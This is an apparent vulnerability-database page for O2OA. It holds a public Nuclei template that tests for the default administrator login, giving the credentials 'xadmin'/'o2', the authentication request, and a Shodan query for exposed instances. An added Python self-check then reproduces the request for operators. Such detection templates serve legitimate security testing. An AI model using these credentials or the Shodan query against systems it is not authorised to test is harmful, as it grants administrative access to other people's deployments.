o2oa-default-login: O2OA - Default Login

Date: 2025-08-01 | Affected software: O2OA | PoC: public

Vulnerability description

O2OA is an open source and free enterprise and team office platform. It provides four major platforms: portal management, process management, information management, and data management. It integrates many functions such as work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration, and meets various management and collaboration needs of enterprises.

PoC code [public]

id: o2oa-default-login

info:
  name: O2OA - Default Login
  author: SleepingBag945
  severity: high
  description: |
    O2OA is an open source and free enterprise and team office platform. It provides four major platforms portal management, process management, information management, and data management. It integrates many functions such as work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration. Meet various management and collaboration needs of enterprises.
  classification:
    cpe: cpe:2.3:a:zoneland:o2oa:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zoneland
    product: o2oa
    shodan-query: title=="O2OA"
  tags: o2oa,default-login,vuln

http:
  - raw:
      - |
        POST /x_organization_assemble_authentication/jaxrs/authentication/captcha HTTP/1.1
        Host: {{Hostname}}
        Cookie: x-token=anonymous
        Authorization: anonymous
        Accept: text/html,application/json,*/*
        Content-Type: application/json; charset=UTF-8

        {"credential":"{{username}}","password":"{{password}}"}

    payloads:
      username:
        - 'xadmin'
      password:
        - 'o2'
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"type\": \"success\""
          - "distinguishedName"
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008422f29f468d825d73af24451ab18c125c8d39d0910de31969dbb5360e08c523022100d2542b4d1c03df0a55e3af3d6f7a50583c5c1e139dbc3c7bf8aea5920f4db3ac:922c64590222798bb761d5b6d8e72950

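The following is an added self-check, not code from the page or from the Nuclei project: it reproduces the template's request and the three matchers (combined with matchers-condition: and) in Python so an O2OA operator can confirm that their own instance no longer accepts the documented default account after rotating it. The sample responses and the distinguishedName value in them are constructed, and base_url is assumed to be the operator's own deployment.

```python
import json
import urllib.error
import urllib.request

# Endpoint and payload pairs from the template above; Nuclei fills in {{Hostname}}
AUTH_PATH = "/x_organization_assemble_authentication/jaxrs/authentication/captcha"
DEFAULT_CREDENTIALS = [("xadmin", "o2")]   # pitchfork pairs username[i]/password[i]
# The three matchers, combined with matchers-condition: and
BODY_WORDS = ['"type": "success"', "distinguishedName"]   # condition: and
HEADER_WORDS = ["application/json"]                        # Nuclei default: or
EXPECTED_STATUS = [200]

def build_request(username, password):
    """Return (method, path, headers, body) equivalent to the template's raw request."""
    headers = {"Cookie": "x-token=anonymous", "Authorization": "anonymous",
               "Accept": "text/html,application/json,*/*",
               "Content-Type": "application/json; charset=UTF-8"}
    body = json.dumps({"credential": username, "password": password})
    return "POST", AUTH_PATH, headers, body

def evaluate_matchers(status, headers, body):
    """Apply the template's matchers; True means the login was accepted."""
    body_ok = all(word in body for word in BODY_WORDS)
    header_blob = "\n".join(f"{k}: {v}" for k, v in headers.items())
    header_ok = any(word in header_blob for word in HEADER_WORDS)
    return body_ok and header_ok and status in EXPECTED_STATUS

def default_login_accepted(base_url, timeout=10):
    """Self-check for one's own instance: False once the default password is rotated."""
    for username, password in DEFAULT_CREDENTIALS:
        method, path, headers, body = build_request(username, password)
        req = urllib.request.Request(base_url.rstrip("/") + path, method=method,
                                     headers=headers, data=body.encode("utf-8"))
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                status, hdrs, text = resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:  # non-2xx responses still carry a body
            status, hdrs, text = err.code, dict(err.headers), err.read().decode("utf-8", "replace")
        if evaluate_matchers(status, hdrs, text):
            return True
    return False

# Constructed sample responses (not captured from a real deployment) for offline checks.
ACCEPTED = (200, {"Content-Type": "application/json"},
            '{"type": "success", "data": {"distinguishedName": "xadmin@placeholder"}}')
REJECTED = (200, {"Content-Type": "application/json"}, '{"type": "error", "message": "login failed"}')
```

A result of True from default_login_accepted means the account still uses the default password and must be changed before the instance is exposed further.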